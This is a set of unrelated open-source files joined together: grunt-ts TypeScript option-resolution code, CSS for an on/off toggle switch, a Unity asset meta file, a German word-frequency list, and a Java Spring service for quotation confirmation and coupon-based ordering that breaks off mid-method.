result = applyGruntTSDefaults(result);
// Preserve a targetName resolved earlier; otherwise use the argument.
if (result.targetName === undefined ||
(!result.targetName && targetName)) {
result.targetName = targetName;
}
return resolve(result);
}).catch((tsConfigError) => {
if (tsConfigError.message) {
result.errors.push('tsconfig error: ' + tsConfigError.message);
} else {
result.errors.push('tsconfig error: ' + JSON.stringify(tsConfigError));
}
return resolve(result);
});
}).catch((vsConfigError) => {
if (vsConfigError.message) {
result.errors.push('Visual Studio config issue: ' + vsConfigError.message);
} else {
result.errors.push('Visual Studio config issue: ' + JSON.stringify(vsConfigError));
}
return resolve(result);
});
});
}
// Gathers `outDir` and `out` from the task and target configs.  The target
// is visited last, so a target-level value overrides the task-level one.
function resolveOutputOptions(rawTaskOptions:
IGruntTargetOptions, rawTargetOptions: IGruntTargetOptions) {
    const result: {outDir?: string, out?: string} = {};
    for (const source of [rawTaskOptions, rawTargetOptions]) {
        if (!source) {
            continue;
        }
        for (const propertyName of ['outDir', 'out']) {
            if (propertyName in source) {
                result[propertyName] = source[propertyName];
            }
        }
    }
    return result;
}
// Ensures a raw config object carries an `options` member so later code can
// read from it without null checks.  Null/undefined configs are left alone.
function fixMissingOptions(config: ITargetOptions) {
    if (!config) {
        return;
    }
    if (!config.options) {
        config.options = <any>{};
    }
}
// Seeds an options-resolution result with empty warning and error lists;
// all other IGruntTSOptions members are filled in during resolution.
function emptyOptionsResolveResult() {
    const seed = {
        warnings: <string[]>[],
        errors: <string[]>[]
    };
    return <IGruntTSOptions><any>seed;
}
// Placeholder hook for emitting extra late-stage configuration warnings;
// currently returns the options unchanged.
function logAdditionalConfigurationWarnings(options: IGruntTSOptions) {
return options;
}
/**
 * Inspects the raw task and target configuration for common mistakes:
 * wrongly-cased property names (auto-fixed in place), properties placed on
 * the wrong level (task/target vs. options), `fast` combined with `files`
 * (auto-disabled), and several mutually exclusive settings.  Returns the
 * collected errors and warnings; the nested helpers below close over the
 * `warnings` array and the lowercased property-name lists.
 */
function resolveAndWarnOnConfigurationIssues(task: ITargetOptions,
target: ITargetOptions, targetName: string) {
let errors : string[] = [], warnings: string[] = [];
const lowercaseTargetProps = _.map(propertiesFromTarget, (prop) => prop.toLocaleLowerCase());
const lowercaseTargetOptionsProps = _.map(propertiesFromTargetOptions, (prop) => prop.toLocaleLowerCase());
// Case fixes must run before location checks so the latter sees the
// corrected property names.
checkFixableCaseIssues(task, 'ts task');
checkFixableCaseIssues(target, `target "${targetName}"`);
checkLocations(task, 'ts task');
checkLocations(target, `target "${targetName}"`);
fixFilesUsedWithFast(task, 'ts task');
fixFilesUsedWithFast(target, `target "${targetName}"`);
warnings.push(...getAdditionalWarnings(task, target, targetName));
return {errors, warnings};
// Warns about conflicting or unsupported combinations that cannot be
// auto-fixed (reserved target names, files+src, files+vs, array dest,
// outFile via Gruntfile).
function getAdditionalWarnings(task: any, target: any, targetName: string) {
const additionalWarnings = [];
if (propertiesFromTarget.indexOf(targetName) >= 0) {
additionalWarnings.push(`Warning: Using the grunt-ts keyword "${targetName}" as a target name may cause ` +
`incorrect behavior or errors.`);
}
if (((task && task.src && targetName !== 'src') || (target && target.src)) &&
((task && task.files) || (target && target.files))) {
additionalWarnings.push(`Warning: In task "${targetName}", either "files" or "src" should be used - not both.`);
}
if (((task && task.vs) || (target && target.vs)) &&
((task && task.files) || (target && target.files))) {
additionalWarnings.push(`Warning: In task "${targetName}", either "files" or "vs" should be used - not both.`);
}
if (usingDestArray(task) || usingDestArray(target)) {
additionalWarnings.push(`Warning: target "${targetName}" has an array specified for the files.dest property.` +
` This is not supported. Taking first element and ignoring the rest.`);
}
if ((task && task.outFile) || (target && target.outFile)) {
additionalWarnings.push(`Warning: target "${targetName}" is using "outFile". This is not supported by` +
` grunt-ts via the Gruntfile - it's only relevant when present in tsconfig.json file. Use "out" instead.`);
}
return additionalWarnings;
// True when any entry of files[] uses an array for `dest`.
function usingDestArray(task) {
let result = false;
if (task && task.files && _.isArray(task.files)) {
task.files.forEach(item => {
if (_.isArray(item.dest)) {
result = true;
};
});
}
return result;
}
}
// `fast` compilation cannot work with `files`; force it off and warn.
function fixFilesUsedWithFast(task: any, configName: string) {
if (task && task.files && task.options && task.options.fast) {
warnings.push(`Warning: ${configName} is attempting to use fast compilation with "files". ` +
`This is not currently supported. Setting "fast" to "never".`);
task.options.fast = 'never';
}
}
// Warns about properties that appear at the wrong level (an options-only
// property on the task/target, or vice versa).  Such properties are
// ignored by the resolver, so the warning is the only signal the user gets.
function checkLocations(task: ITargetOptions, configName: string) {
// todo: clean this up. The top and bottom sections are largely the same.
if (task) {
for (let propertyName in task) {
if (propertiesFromTarget.indexOf(propertyName) === -1 && propertyName !== 'options') {
if (propertiesFromTargetOptions.indexOf(propertyName) > -1 &&
!_.isPlainObject(task[propertyName])) {
let warningText = `Property "${propertyName}" in ${configName} is possibly in the wrong place and will be ignored. ` +
`It is expected on the options object.`;
warnings.push(warningText);
} else if (lowercaseTargetProps.indexOf(propertyName.toLocaleLowerCase()) === -1 &&
lowercaseTargetOptionsProps.indexOf(propertyName.toLocaleLowerCase()) > -1 &&
!_.isPlainObject(task[propertyName])) {
let index = lowercaseTargetOptionsProps.indexOf(propertyName.toLocaleLowerCase());
let correctPropertyName = propertiesFromTargetOptions[index];
let warningText = `Property "${propertyName}" in ${configName} is possibly in the wrong place and will be ignored. ` +
`It is expected on the options object. It is also the wrong case and should be ${correctPropertyName}.`;
warnings.push(warningText);
}
}
}
if (task.options) {
for (let propertyName in task.options) {
if (propertiesFromTargetOptions.indexOf(propertyName) === -1) {
if (propertiesFromTarget.indexOf(propertyName) > -1) {
let warningText = `Property "${propertyName}" in ${configName} is possibly in the wrong place and will be ignored. ` +
`It is expected on the task or target, not under options.`;
warnings.push(warningText);
} else if (lowercaseTargetOptionsProps.indexOf(propertyName.toLocaleLowerCase()) === -1
&& lowercaseTargetProps.indexOf(propertyName.toLocaleLowerCase()) > -1) {
let index = lowercaseTargetProps.indexOf(propertyName.toLocaleLowerCase());
let correctPropertyName = propertiesFromTarget[index];
let warningText = `Property "${propertyName}" in ${configName} is possibly in the wrong place and will be ignored. ` +
`It is expected on the task or target, not under options. It is also the wrong case and should be ${correctPropertyName}.`;
warnings.push(warningText);
}
}
}
}
}
}
// Detects properties whose only problem is casing (e.g. `Watch` instead of
// `watch`) and renames them in place on the config object, with a warning.
function checkFixableCaseIssues(task: ITargetOptions, configName: string) {
if (task) {
for (let propertyName in task) {
if ((propertiesFromTarget.indexOf(propertyName) === -1)
&& (lowercaseTargetProps.indexOf(propertyName.toLocaleLowerCase()) > -1)
&& (propertiesFromTargetOptions.indexOf(propertyName) === -1)) {
let index = lowercaseTargetProps.indexOf(propertyName.toLocaleLowerCase());
let correctPropertyName = propertiesFromTarget[index];
let warningText = `Property "${propertyName}" in ${configName} is incorrectly cased; it should ` +
`be "${correctPropertyName}". Fixing it for you and proceeding.`;
warnings.push(warningText);
task[correctPropertyName] = task[propertyName];
delete task[propertyName];
}
}
for (let propertyName in task.options) {
if ((propertiesFromTargetOptions.indexOf(propertyName) === -1)
&& (lowercaseTargetOptionsProps.indexOf(propertyName.toLocaleLowerCase()) > -1)
&& (propertiesFromTarget.indexOf(propertyName) === -1)) {
let index = lowercaseTargetOptionsProps.indexOf(propertyName.toLocaleLowerCase());
let correctPropertyName = propertiesFromTargetOptions[index];
let warningText = `Property "${propertyName}" in ${configName} options is incorrectly cased; it should ` +
`be "${correctPropertyName}". Fixing it for you and proceeding.`;
warnings.push(warningText);
task.options[correctPropertyName] = task.options[propertyName];
delete task.options[propertyName];
}
}
}
}
}
// Copies recognized properties from a raw Grunt config onto the accumulated
// options object.  Task/target-level properties come from the whitelist
// `propertiesFromTarget` ('vs' is handled elsewhere); options-level
// properties come from `propertiesFromTargetOptions`.  String values are run
// through the template processor unless the property's expansion is
// deliberately delayed.
function applyGruntOptions(applyTo: IGruntTSOptions, gruntOptions: ITargetOptions): IGruntTSOptions {
    const copyProperty = (source: any, propertyName: string) => {
        const value = source[propertyName];
        if (typeof value === 'string' && utils.hasValue(value) &&
            delayTemplateExpansion.indexOf(propertyName) === -1) {
            applyTo[propertyName] = templateProcessor(value, {});
        } else {
            applyTo[propertyName] = value;
        }
    };
    if (gruntOptions) {
        propertiesFromTarget.forEach((propertyName) => {
            if (propertyName in gruntOptions && propertyName !== 'vs') {
                copyProperty(gruntOptions, propertyName);
            }
        });
        if (gruntOptions.options) {
            propertiesFromTargetOptions.forEach((propertyName) => {
                if (propertyName in gruntOptions.options) {
                    copyProperty(gruntOptions.options, propertyName);
                }
            });
        }
    }
    return applyTo;
}
/**
 * Merges the Grunt-resolved file groups (and any task/target-level `out` /
 * `outDir` values) into `options.CompilationTasks`.
 *
 * @param options accumulated grunt-ts options; `CompilationTasks` is created
 *   here when absent.
 * @param resolvedFiles file groups already expanded by Grunt (may be empty,
 *   e.g. for a tsconfig-driven compile).
 * @param outputInfo `out` / `outDir` values gathered by resolveOutputOptions.
 * @returns the same `options` object with compilation tasks appended.
 */
function copyCompilationTasks(options: IGruntTSOptions, resolvedFiles: IGruntTSCompilationInfo[], outputInfo: {outDir?: string, out?: string}) {
    if (!utils.hasValue(options.CompilationTasks)) {
        options.CompilationTasks = [];
    }
    if (!utils.hasValue(resolvedFiles) || resolvedFiles.length === 0) {
        // No files resolved by Grunt: still honor a bare `out`/`outDir` so a
        // tsconfig-driven compilation can use it.
        if (options.CompilationTasks.length === 0 && (('outDir' in outputInfo) || ('out' in outputInfo))) {
            const newCompilationTask: IGruntTSCompilationInfo = {
                src: []
            };
            if ('outDir' in outputInfo) {
                newCompilationTask.outDir = outputInfo.outDir;
            }
            if ('out' in outputInfo) {
                // Fixed copy/paste bug: this branch previously re-assigned
                // `outputInfo.outDir` to `outDir`, silently dropping `out`.
                newCompilationTask.out = outputInfo.out;
            }
            options.CompilationTasks.push(newCompilationTask);
        }
        return options;
    }
    for (let i = 0; i < resolvedFiles.length; i += 1) {
        // Keep the original, pre-expansion glob so later phases (watch/fast)
        // can re-expand it.
        let glob: string[];
        const orig = (<{orig?: {src?: string[] | string}}>resolvedFiles[i]).orig;
        if (orig && ('src' in orig)) {
            glob = [].concat(orig.src);
        }
        let compilationSet = {
            src: _.map(resolvedFiles[i].src, (fileName) => utils.enclosePathInQuotesIfRequired(fileName)),
            out: utils.enclosePathInQuotesIfRequired(resolvedFiles[i].out),
            outDir: utils.enclosePathInQuotesIfRequired(resolvedFiles[i].outDir),
            glob
        };
        if ('dest' in resolvedFiles[i] && resolvedFiles[i].dest) {
            let dest: string;
            if (_.isArray(resolvedFiles[i].dest)) {
                // Arrays for dest are unsupported; a warning was already
                // issued upstream.  Take the first element.
                dest = resolvedFiles[i].dest[0];
            } else {
                dest = resolvedFiles[i].dest;
            }
            // A .js dest means single-file output (`out`); anything else is
            // treated as an output directory (`outDir`).
            if (utils.isJavaScriptFile(dest)) {
                compilationSet.out = dest;
            } else {
                compilationSet.outDir = dest;
            }
        }
        options.CompilationTasks.push(compilationSet);
    }
    return options;
}
// Quotes the path-valued compiler options (rootDir, mapRoot, sourceRoot)
// when they contain characters that require it; empty/absent values are
// left untouched.
function enclosePathsInQuotesIfRequired(options: IGruntTSOptions) {
    const pathProperties = ['rootDir', 'mapRoot', 'sourceRoot'];
    for (const propertyName of pathProperties) {
        if (options[propertyName]) {
            options[propertyName] = utils.enclosePathInQuotesIfRequired(options[propertyName]);
        }
    }
    return options;
}
/**
 * Resolves interactions between related options after all sources have been
 * merged: implied flags, mutually exclusive pairs (inlineSourceMap vs.
 * sourceMap, out vs. outDir, comments vs. removeComments) and sanity checks
 * such as `html` without any sources to compile.
 */
function addressAssociatedOptionsAndResolveConflicts(options: IGruntTSOptions) {
// emitDecoratorMetadata requires the decorators feature to be on.
if (options.emitDecoratorMetadata) {
options.experimentalDecorators = true;
}
if (options.inlineSourceMap && options.sourceMap) {
options.warnings.push('TypeScript cannot use inlineSourceMap and sourceMap together. Ignoring sourceMap.');
options.sourceMap = false;
}
// inlineSources needs a source map; with no external sourceMap requested,
// switch on inlineSourceMap to carry it.
if (options.inlineSources && !options.sourceMap) {
options.inlineSources = true;
options.inlineSourceMap = true;
options.sourceMap = false;
}
// `comments` (grunt-ts) and `removeComments` (tsc) are opposites; keep
// them consistent, with removeComments winning when both are present.
if ('comments' in options && 'removeComments' in options) {
options.warnings.push(`WARNING: Option "comments" and "removeComments" should not be used together. ` +
`The --removeComments value of ${!!options.removeComments} supercedes the --comments value of ${!!options.comments}`);
}
if ('comments' in options && !('removeComments' in options)) {
options.comments = !!options.comments;
options.removeComments = !options.comments;
} else if (!('comments' in options) && ('removeComments' in options)) {
options.removeComments = !!options.removeComments;
options.comments = !options.removeComments;
}
// The html transform only runs as part of a compilation, so html without
// any src/glob is an error.
if ('html' in options &&
(options.CompilationTasks.length === 0 ||
!_.some(options.CompilationTasks, item => ((item.src || []).length > 0 || (item.glob || []).length > 0)))) {
options.errors.push(`ERROR: option "html" provided without corresponding TypeScript source files or glob to ` +
`compile. The transform will not occur unless grunt-ts also expects to compile some files.`);
}
// Per compilation task, `out` and `outDir` are mutually exclusive;
// prefer outDir.
options.CompilationTasks.forEach(compileTask => {
if (compileTask.out && compileTask.outDir) {
options.warnings.push(
'The parameter `out` is incompatible with `outDir`; pass one or the other - not both. Ignoring `out` and using `outDir`.'
);
compileTask.out = '';
}
});
return options;
}
// Fills in GruntTSDefaults for any option the user did not specify.  Two
// cases are special: sourceMap is only defaulted when neither sourceMap nor
// inlineSourceMap was given, and removeComments is only defaulted when
// neither removeComments nor comments was given.
function applyGruntTSDefaults(options: IGruntTSOptions) {
    const applyDefault = (propertyName: string, defaultValue: any) => {
        if (!(propertyName in options)) {
            options[propertyName] = defaultValue;
        }
    };
    if (!('sourceMap' in options) && !('inlineSourceMap' in options)) {
        options.sourceMap = GruntTSDefaults.sourceMap;
    }
    applyDefault('target', GruntTSDefaults.target);
    applyDefault('fast', GruntTSDefaults.fast);
    applyDefault('compile', GruntTSDefaults.compile);
    applyDefault('htmlOutDir', null);
    applyDefault('htmlOutDirFlatten', GruntTSDefaults.htmlOutDirFlatten);
    applyDefault('htmlModuleTemplate', GruntTSDefaults.htmlModuleTemplate);
    applyDefault('htmlVarTemplate', GruntTSDefaults.htmlVarTemplate);
    if (!('removeComments' in options) && !('comments' in options)) {
        options.removeComments = GruntTSDefaults.removeComments;
    }
    applyDefault('failOnTypeErrors', GruntTSDefaults.failOnTypeErrors);
    applyDefault('emitGruntEvents', GruntTSDefaults.emitGruntEvents);
    return options;
}
| {
"pile_set_name": "Github"
} |
/* Toggle ("ON/OFF") switch built from a hidden checkbox plus styled label.
   The checkbox's :checked state drives the sliding animation below. */
.onoffswitch {
position: relative; width: 90px;
-webkit-user-select:none; -moz-user-select:none; -ms-user-select: none;
}
/* The real checkbox is hidden; the label is the visible control. */
.onoffswitch-checkbox {
display: none;
}
.onoffswitch-label {
display: block; overflow: hidden; cursor: pointer;
border: 2px solid #FFFFFF; border-radius: 20px;
}
/* Inner strip is twice the width of the control; sliding it left/right via
   margin-left reveals either the ON or the OFF half. */
.onoffswitch-inner {
display: block; width: 200%; margin-left: -100%;
transition: margin 0.3s ease-in 0s;
}
.onoffswitch-inner:before, .onoffswitch-inner:after {
display: block; float: left; width: 50%; height: 30px; padding: 0; line-height: 30px;
font-size: 15px; color: white; font-family: Trebuchet, Arial, sans-serif; font-weight: bold;
box-sizing: border-box;
}
/* Left half: the "ON" face. */
.onoffswitch-inner:before {
content: "ON";
padding-left: 12px;
background-color: #008CBA; color: #FFFFFF;
}
/* Right half: the "OFF" face. */
.onoffswitch-inner:after {
content: "OFF";
padding-right: 12px;
background-color: #EEEEEE; color: #999999;
text-align: right;
}
/* The round knob that slides between the two ends. */
.onoffswitch-switch {
display: block; width: 12px; margin: 9px;
background: #FFFFFF;
position: absolute; top: 0; bottom: 0;
right: 56px;
border: 2px solid #FFFFFF; border-radius: 20px;
transition: all 0.3s ease-in 0s;
}
/* Checked state: slide the strip to show "ON" and move the knob right. */
.onoffswitch-checkbox:checked + .onoffswitch-label .onoffswitch-inner {
margin-left: 0;
}
.onoffswitch-checkbox:checked + .onoffswitch-label .onoffswitch-switch {
right: 0px;
}
| {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: 8384ab388a4037649a1f64fb2e1a8e7f
timeCreated: 1524005968
licenseType: Free
NativeFormatImporter:
mainObjectFileID: 11400000
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
JEKATERINBURG 2
JENA 6
JERUSALEM 48
JET 2
Je 58
Jean 54
Jean-Bertrand 6
Jean-Christophe 2
Jean-Claude 10
Jean-Cyril 2
Jean-Francois 2
Jean-Jacques 8
Jean-Louis 8
Jean-Luc 8
Jean-Marie 4
Jean-Michel 4
Jean-Pascal 4
Jean-Paul 2
Jean-Pierre 2
Jean-Pol 2
Jeanne 6
Jeannette 4
Jeans 2
Jecken 2
Jede 32
Jedem 4
Jeden 8
Jedenfalls 22
Jeder 80
Jedermann 4
Jedes 26
Jedesmal 8
Jediot 2
Jedoch 16
Jeep 2
Jeep-Safari 2
Jeff 4
Jefferson 2
Jeffrey 8
Jegor 6
Jekken 2
Jellinek 2
Jellineks 2
Jelpke 4
Jelzin 148
Jelzin-Clique 2
Jelzins 18
Jemand 4
Jemen 6
Jemeniter 4
Jemenitische 2
Jemens 4
Jena 24
Jenaer 10
Jene 8
Jener 2
Jenkins 4
Jennie 2
Jenoptik 10
Jenoptik-Führungskräfte 2
Jenoptik-GmbH 2
Jenoptik-Manager 2
Jens 14
Jenseits 16
Jeremy 2
Jericho 4
Jerko 2
Jeroen 2
Jersey 4
Jeru-Salem 2
Jerusalem 74
Jerusalem-Besuch 2
Jerusalemer 4
Jerusalems 4
Jerzy 10
Jeschke 2
Jesper 2
Jesuit 2
Jesuiten-Zögling 2
Jesus 6
Jet 2
Jets 14
Jetta-Modellen 2
Jetz 2
Jetzt 160
Jever 6
Jeweils 4
Jewgeni 4
Jewish 4
je 274
jede 154
jedem 134
jeden 194
jedenfalls 118
jeder 266
jederart 2
jedermann 14
jederzeit 18
jedes 118
jedesmal 10
jedoch 810
jedwede 2
jedweder 8
jegliche 14
jeglichen 6
jeglicher 4
jegliches 2
jeher 6
jeht 2
jemals 14
jemand 62
jemandem 8
jemanden 14
jemenitische 2
jemenitischen 8
jemenitischer 6
jene 200
jenem 24
jenen 76
jener 96
jenes 52
jenseitigen 2
jenseits 80
jetten 2
jetzige 32
jetzigen 40
jetziges 4
jetzt 832
jeweilig 2
jeweilige 8
jeweiligen 42
jeweiliges 2
jeweils 168
| {
"pile_set_name": "Github"
} |
package com.aylson.dc.owner.service.impl;
import java.util.Date;
import java.util.List;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import org.springframework.transaction.annotation.Transactional;
import com.aylson.core.exception.ServiceException;
import com.aylson.core.frame.dao.BaseDao;
import com.aylson.core.frame.domain.Result;
import com.aylson.core.frame.domain.ResultCode;
import com.aylson.core.frame.service.impl.BaseServiceImpl;
import com.aylson.dc.base.OwnerGeneralConstant.AppointmentState;
import com.aylson.dc.base.OwnerGeneralConstant.DesignState;
import com.aylson.dc.owner.dao.DesignDao;
import com.aylson.dc.owner.po.Design;
import com.aylson.dc.owner.search.DesignSearch;
import com.aylson.dc.owner.service.AppointmentService;
import com.aylson.dc.owner.service.DesignService;
import com.aylson.dc.owner.service.OrderService;
import com.aylson.dc.owner.service.QuotationService;
import com.aylson.dc.owner.vo.AppointmentVo;
import com.aylson.dc.owner.vo.DesignVo;
import com.aylson.dc.owner.vo.OrderVo;
import com.aylson.dc.owner.vo.QuotationVo;
import com.aylson.dc.sys.po.CouponUserRelations;
import com.aylson.dc.sys.service.CouponDetailService;
import com.aylson.dc.sys.service.CouponUserRelationsService;
import com.aylson.dc.sys.vo.CouponDetailVo;
/**
 * Service implementation for owner-side design records ({@link Design}).
 *
 * Handles quotation confirmation for a single design ({@link #confirmQuotation})
 * and for all designs of an appointment (two {@code confirmAllQuotation}
 * overloads, the second supporting a coupon).  State transitions are kept in
 * sync between the design table and the owning appointment; order creation and
 * coupon redemption happen inside the same transaction, with
 * {@link ServiceException} thrown to force a rollback on partial failure.
 */
@Service
public class DesignServiceImpl extends BaseServiceImpl<Design,DesignSearch> implements DesignService {

    @Autowired
    private DesignDao designDao;
    @Autowired
    private AppointmentService appointmentService;
    @Autowired
    private OrderService orderService;
    // Coupon/user relation service (which user holds which coupon).
    @Autowired
    private CouponUserRelationsService couponUserRelationsService;
    // Coupon campaign detail configuration service.
    @Autowired
    private CouponDetailService couponDetailService;
    // Quotation service (the original comment here was a copy/paste of the
    // coupon one; this field is the quotation service).
    @Autowired
    private QuotationService quotationService;

    @Override
    protected BaseDao<Design,DesignSearch> getBaseDao() {
        return designDao;
    }

    /**
     * Confirms (or rejects) the quotation of a single design.
     *
     * If satisfied, the design moves to SATISFY_QUOTE; when every design of
     * the same appointment is satisfied, the appointment moves to
     * SATISFY_QUOTE as well.  If not satisfied, the design moves to
     * NOTSATISFY_QUOTE and the appointment follows unless it is already in
     * that state.
     *
     * @param designId  id of the design record; must not be null
     * @param isSatisfy true = satisfied with the quotation; must not be null
     * @return result with CODE_STATE_200 on success, CODE_STATE_4006 on
     *         validation/update failure
     */
    @Override
    @Transactional
    public Result confirmQuotation(Integer designId, Boolean isSatisfy) {
        Result result = new Result();
        // Parameter validation.
        if (designId == null) {
            result.setError(ResultCode.CODE_STATE_4006, "获取不到设计信息表id");
            return result;
        }
        if (isSatisfy == null) {
            result.setError(ResultCode.CODE_STATE_4006, "获取不到确认的结果");
            return result;
        }
        DesignVo designVo = this.designDao.selectById(designId);
        Boolean flag = false;                 // update outcome
        Boolean canUpdateAppoint = false;     // whether the appointment state must change too
        Integer appointState = AppointmentState.SATISFY_QUOTE; // target appointment state
        if (isSatisfy) {
            designVo.setState(DesignState.SATISFY_QUOTE);
        } else {
            designVo.setState(DesignState.NOTSATISFY_QUOTE);
        }
        flag = this.designDao.updateById(designVo); // persist the design state
        if (flag) {
            // Rejection: propagate to the appointment unless it already says so.
            // NOTE(review): getAppointState() is unboxed here -- assumes it is
            // never null at this point.
            if (!isSatisfy && AppointmentState.NOTSATISFY_QUOTE != designVo.getAppointState()) {
                appointState = AppointmentState.NOTSATISFY_QUOTE;
                canUpdateAppoint = true;
            }
            if (isSatisfy) {
                // Fixed: assume all designs are satisfied until a rejected one
                // is found.  Previously canUpdateAppoint was never set true on
                // this path, so the appointment could never reach SATISFY_QUOTE.
                canUpdateAppoint = true;
                DesignSearch designSearch = new DesignSearch();
                // Fixed: scope the query to this appointment.  Previously the
                // search had no appointId, so ALL designs in the table were
                // scanned when deciding whether the appointment is satisfied.
                designSearch.setAppointId(designVo.getAppointId());
                List<DesignVo> designVoList = this.designDao.select(designSearch);
                if (designVoList != null && designVoList.size() > 0) {
                    for (DesignVo temp : designVoList) {
                        if (DesignState.NOTSATISFY_QUOTE == temp.getState().intValue()) { // still rejected
                            canUpdateAppoint = false;
                            break;
                        }
                    }
                }
            }
            if (canUpdateAppoint) {
                AppointmentVo appointmentVo = new AppointmentVo();
                appointmentVo.setId(designVo.getAppointId());
                appointmentVo.setState(appointState);
                flag = this.appointmentService.edit(appointmentVo);
                if (!flag) {
                    result.setError(ResultCode.CODE_STATE_4006, "更新预约信息状态失败");
                    // Throw to roll back the design update made above.
                    throw new ServiceException("更新预约信息状态失败");
                }
            }
            result.setOK(ResultCode.CODE_STATE_200, "操作成功");
        } else {
            result.setError(ResultCode.CODE_STATE_4006, "更新设计信息表状态失败");
            return result;
        }
        return result;
    }

    /**
     * Confirms (or rejects) the quotations of ALL designs of an appointment.
     * On satisfaction, every design and the appointment move to CONFIRM_ORDER
     * and one order per design is created; otherwise everything moves to
     * NOTSATISFY_QUOTE.
     *
     * @param appointId id of the appointment; must not be null
     * @param isSatisfy true = satisfied with all quotations; must not be null
     * @return result with CODE_STATE_200 on success
     */
    @Override
    @Transactional
    public Result confirmAllQuotation(Integer appointId, Boolean isSatisfy) {
        Result result = new Result();
        // Parameter validation.
        if (appointId == null) {
            result.setError(ResultCode.CODE_STATE_4006, "找不到预约信息,请稍候再试");
            return result;
        }
        if (isSatisfy == null) {
            result.setError(ResultCode.CODE_STATE_4006, "获取不到确认的结果");
            return result;
        }
        // Load the appointment's designs and compute the new states.
        DesignSearch designSearch = new DesignSearch();
        designSearch.setAppointId(appointId);
        List<DesignVo> designList = this.designDao.select(designSearch);
        AppointmentVo appointmentVo = new AppointmentVo();
        appointmentVo.setId(appointId);
        if (designList != null && designList.size() > 0) {
            for (DesignVo designVo : designList) {
                if (isSatisfy) {
                    designVo.setState(DesignState.CONFIRM_ORDER);
                    appointmentVo.setState(AppointmentState.CONFIRM_ORDER);
                } else {
                    designVo.setState(DesignState.NOTSATISFY_QUOTE);
                    appointmentVo.setState(AppointmentState.NOTSATISFY_QUOTE);
                }
            }
        } else {
            result.setError(ResultCode.CODE_STATE_4006, "找不到对应的设计信息");
            return result;
        }
        // Persist appointment first, then the designs; throw on partial
        // failure so @Transactional rolls everything back.
        Boolean flag = this.appointmentService.edit(appointmentVo);
        if (flag) {
            flag = this.designDao.batchUpdate(designList);
            if (!flag) {
                result.setError(ResultCode.CODE_STATE_4006, "更新报价状态信息失败");
                throw new ServiceException("更新报价状态信息失败");
            }
        } else {
            result.setError(ResultCode.CODE_STATE_4006, "更新预约状态信息失败");
            return result;
        }
        // Satisfied: create one order per design from the appointment data.
        if (isSatisfy) {
            AppointmentVo appointVo = this.appointmentService.getById(appointId);
            for (DesignVo designVo : designList) {
                OrderVo orderVo = new OrderVo();
                orderVo.setAppointId(appointId);
                orderVo.setAppointNo(appointVo.getBillCode());
                orderVo.setMobilePhone(appointVo.getMobilePhone());
                orderVo.setName(appointVo.getName());
                orderVo.setProvince(appointVo.getProvince());
                orderVo.setProvinceId(appointVo.getProvinceId());
                orderVo.setCity(appointVo.getCity());
                orderVo.setCityId(appointVo.getCityId());
                orderVo.setArea(appointVo.getArea());
                orderVo.setAreaId(appointVo.getAreaId());
                orderVo.setAddress(appointVo.getAddress());
                orderVo.setDecorateProject(appointVo.getDecorateProject());
                orderVo.setDecorateProjectTypes(appointVo.getDecorateProjectTypes());
                orderVo.setDesignId(designVo.getId());
                orderVo.setDesignNo(designVo.getBillCode());
                orderVo.setDesignType(designVo.getDesignType());
                result = this.orderService.addOrder(orderVo);
                if (!result.isSuccess()) {
                    throw new ServiceException("添加订单失败");
                }
            }
        }
        result.setOK(ResultCode.CODE_STATE_200, "操作成功");
        return result;
    }

    /**
     * Coupon-aware variant of {@link #confirmAllQuotation(Integer, Boolean)}.
     * Additionally validates the coupon (must exist, belong to the user, and
     * be unused), records its value on the first design's quotation, and
     * marks it used -- all inside the same transaction.
     *
     * @param appointId    id of the appointment; must not be null
     * @param couponId     id of the coupon detail, nullable (both coupon
     *                     params must be given together)
     * @param couponUserId id of the user-coupon relation, nullable
     * @param isSatisfy    true = satisfied with all quotations; must not be null
     * @return result with CODE_STATE_200 on success
     */
    @Override
    @Transactional
    public Result confirmAllQuotation(Integer appointId, Integer couponId, Integer couponUserId, Boolean isSatisfy) {
        Result result = new Result();
        CouponDetailVo couponDetailVo = null;           // coupon configuration detail
        CouponUserRelations couponUserRelations = null; // user's coupon record
        // Parameter validation.
        if (appointId == null) {
            result.setError(ResultCode.CODE_STATE_4006, "获取预约信息失败,请稍候再试");
            return result;
        }
        if (isSatisfy == null) {
            result.setError(ResultCode.CODE_STATE_4006, "获取不到确认的结果");
            return result;
        }
        AppointmentVo appointVo = this.appointmentService.getById(appointId);
        if (appointVo == null) {
            result.setError(ResultCode.CODE_STATE_4006, "获取预约信息失败,请稍候再试");
            return result;
        }
        // Guard against double ordering.
        if (appointVo != null && AppointmentState.CONFIRM_ORDER == appointVo.getState().intValue()) {
            result.setError(ResultCode.CODE_STATE_4006, "已经下过单了,不能重复下单");
            return result;
        }
        if (isSatisfy) { // coupon checks only matter when actually ordering
            if ((couponId != null && couponUserId == null)
                    || (couponId == null && couponUserId != null)) {
                result.setError(ResultCode.CODE_STATE_4006, "优惠券信息不完整");
                return result;
            }
            // When a coupon is supplied, it must exist, belong to a user
            // record, and be unused.
            if (couponId != null && couponUserId != null) {
                couponDetailVo = this.couponDetailService.getById(couponId);
                if (couponDetailVo == null) {
                    result.setError(ResultCode.CODE_STATE_4006, "找不到该优惠券的信息");
                    return result;
                }
                couponUserRelations = this.couponUserRelationsService.getById(couponUserId);
                if (couponUserRelations == null) {
                    result.setError(ResultCode.CODE_STATE_4006, "找不到该优惠券的用户信息");
                    return result;
                }
                if (couponUserRelations.getIsUsed().intValue() == 1) {
                    result.setError(ResultCode.CODE_STATE_4006, "该优惠券已经使用过了");
                    return result;
                }
            }
        }
        // Load the appointment's designs and compute the new states.
        DesignSearch designSearch = new DesignSearch();
        designSearch.setAppointId(appointId);
        List<DesignVo> designList = this.designDao.select(designSearch);
        AppointmentVo appointmentVo = new AppointmentVo();
        appointmentVo.setId(appointId);
        if (designList != null && designList.size() > 0) {
            for (DesignVo designVo : designList) {
                if (isSatisfy) {
                    designVo.setState(DesignState.CONFIRM_ORDER);
                    appointmentVo.setState(AppointmentState.CONFIRM_ORDER);
                } else {
                    designVo.setState(DesignState.NOTSATISFY_QUOTE);
                    appointmentVo.setState(AppointmentState.NOTSATISFY_QUOTE);
                }
            }
        } else {
            result.setError(ResultCode.CODE_STATE_4006, "找不到对应的设计信息");
            return result;
        }
        // Persist appointment first, then the designs; throw on partial
        // failure so @Transactional rolls everything back.
        Boolean flag = this.appointmentService.edit(appointmentVo);
        if (flag) {
